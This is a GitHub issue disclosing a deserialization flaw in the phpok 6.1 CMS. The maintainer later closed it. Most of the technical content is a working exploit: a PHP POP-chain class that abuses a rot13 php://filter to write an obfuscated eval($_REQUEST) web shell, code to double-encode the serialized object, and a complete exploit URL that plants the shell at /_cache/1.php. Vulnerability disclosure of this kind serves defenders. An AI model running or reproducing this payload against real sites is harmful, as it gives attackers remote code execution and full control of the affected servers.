Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

phpok 6.1 has a new deserialization vulnerability, and can write any files #13

Closed
T4rnRookie opened this issue Sep 15, 2022 · 0 comments
Closed

phpok 6.1 has a new deserialization vulnerability, and can write any files #13

T4rnRookie opened this issue Sep 15, 2022 · 0 comments

Comments

@T4rnRookie
Copy link

I noticed in framework/phpok_call.php::_format_ext_all has an unserialize
and in phpok 5.4 has already fixed something
just like this
https://www.anquanke.com/post/id/194453#h2-5

but in
/framework/phpok_call.php I noticed I found a parse_str
image
$rs we can control so we just need to use double urlencoded can bypass it but noticed this
image
alias we can use weak compared to bypass

and we can write a pop chain use rot13 bypass

<?php
class cache
{
	protected $timeout = 1800;
	protected $status = true;
	protected $prefix = 'qinggan_';
	protected $keyfile = '';
	protected $folder = 'php://filter/string.rot13/resource=./_cache/';
	protected $key_id="1";
	protected $key_list='<?cuc riny($_ERDHRFG[1]); ?>';
	protected $debug = false;
	protected $time;
	private $time_use = 0;
	private $time_tmp = 0;
	private $count = 0;

	
}

echo urlencode(urlencode( serialize( new cache())));

final payload:

http://127.0.0.1:8010/api.php?c=call&f=index&data={%22m_picplayer%22:%220%26type_id%3Dformat_ext_all%26x%5Bform_type%5D%3Durl%26x%5Bcontent]=O%253A5%253A%2522cache%2522%253A12%253A%257Bs%253A10%253A%2522%2500%252A%2500timeout%2522%253Bi%253A1800%253Bs%253A9%253A%2522%2500%252A%2500status%2522%253Bb%253A1%253Bs%253A9%253A%2522%2500%252A%2500prefix%2522%253Bs%253A8%253A%2522qinggan_%2522%253Bs%253A10%253A%2522%2500%252A%2500keyfile%2522%253Bs%253A0%253A%2522%2522%253Bs%253A9%253A%2522%2500%252A%2500folder%2522%253Bs%253A44%253A%2522php%253A%252F%252Ffilter%252Fstring.rot13%252Fresource%253D.%252F_cache%252F%2522%253Bs%253A9%253A%2522%2500%252A%2500key_id%2522%253Bs%253A1%253A%25221%2522%253Bs%253A11%253A%2522%2500%252A%2500key_list%2522%253Bs%253A28%253A%2522%253C%253Fcuc%2Briny%2528%2524_ERDHRFG%255B1%255D%2529%253B%2B%253F%253E%2522%253Bs%253A8%253A%2522%2500%252A%2500debug%2522%253Bb%253A0%253Bs%253A7%253A%2522%2500%252A%2500time%2522%253BN%253Bs%253A15%253A%2522%2500cache%2500time_use%2522%253Bi%253A0%253Bs%253A15%253A%2522%2500cache%2500time_tmp%2522%253Bi%253A0%253Bs%253A12%253A%2522%2500cache%2500count%2522%253Bi%253A0%253B%257D"}

and we can get a webshell in /_cache/1.php

image
@qinggan qinggan closed this as completed Mar 11, 2023
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@qinggan @T4rnRookie